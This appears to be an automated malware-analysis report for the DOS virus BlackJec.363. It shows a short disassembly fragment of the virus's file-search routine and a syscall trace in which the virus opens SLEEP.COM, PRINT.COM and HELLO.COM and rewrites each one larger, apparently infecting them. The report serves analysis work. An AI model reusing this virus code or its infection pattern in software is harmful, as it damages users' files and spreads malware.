Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.363

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:32.288034052Z 42 PC: 12a7c | Get date 0x12a7c: mov word ptr [0xf2], dx
0x12a80: mov word ptr [0xf4], cx
0x12a84: stc
0x12a85: lea dx, word ptr [0x262]
0x12a89: mov ah, 0x4e
0x12a8b: mov cx, 0x20
0x12a8e: int 0x21
0x12a90: or ax, ax
0x12a92: je 0x12a97
0x12a94: jmp 0x12b61
0x12a97: mov ah, 0x2f
0x12a99: int 0x21
0x12a9b: mov ax, word ptr es:[bx + 0x1a]
0x12a9f: mov word ptr [0xfc], ax
0x12aa2: add bx, 0x1e
0x12aa5: mov word ptr [0xfe], bx
0x12aa9: mov ax, 0x4f43
0x12aac: sub ax, word ptr [0x9e]
0x12ab0: jne 0x12ab5
0x12ab2: jmp 0x12b55
2018-12-17T22:50:32.291081948Z 78 PC: 12a90 | Find first file
2018-12-17T22:50:32.298728133Z 47 PC: 12a9b | Get disk transfer address
2018-12-17T22:50:32.300478471Z 43 PC: 12af1 | Set date
2018-12-17T22:50:32.304456615Z 61 PC: 12af9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:32.317821723Z 63 PC: 12b07 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T22:50:32.32971695Z 60 PC: 12b39 | Create or truncate file
2018-12-17T22:50:32.349493304Z 64 PC: 12b4b | Write file or device (Write 770 bytes on handle 6)
2018-12-17T22:50:32.359199017Z 62 PC: 12b4f | Close file
2018-12-17T22:50:32.368166204Z 79 PC: 12b5a | Find next file
2018-12-17T22:50:32.371236472Z 47 PC: 12a9b | Get disk transfer address
2018-12-17T22:50:32.372799318Z 43 PC: 12af1 | Set date
2018-12-17T22:50:32.376986555Z 61 PC: 12af9 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:32.390140586Z 63 PC: 12b07 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T22:50:32.397307661Z 60 PC: 12b39 | Create or truncate file
2018-12-17T22:50:32.412324442Z 64 PC: 12b4b | Write file or device (Write 390 bytes on handle 7)
2018-12-17T22:50:32.416652393Z 62 PC: 12b4f | Close file
2018-12-17T22:50:32.425725579Z 79 PC: 12b5a | Find next file
2018-12-17T22:50:32.429610658Z 47 PC: 12a9b | Get disk transfer address
2018-12-17T22:50:32.431648055Z 43 PC: 12af1 | Set date
2018-12-17T22:50:32.435804424Z 61 PC: 12af9 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:32.448890298Z 63 PC: 12b07 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T22:50:32.455893785Z 60 PC: 12b39 | Create or truncate file
2018-12-17T22:50:32.469007101Z 64 PC: 12b4b | Write file or device (Write 455 bytes on handle 8)
2018-12-17T22:50:32.473835722Z 62 PC: 12b4f | Close file
2018-12-17T22:50:32.483669036Z 43 PC: 12b6d | Set date
2018-12-17T22:50:32.488063321Z 76 PC: 12a45 | Terminate with return code (Return code = '0')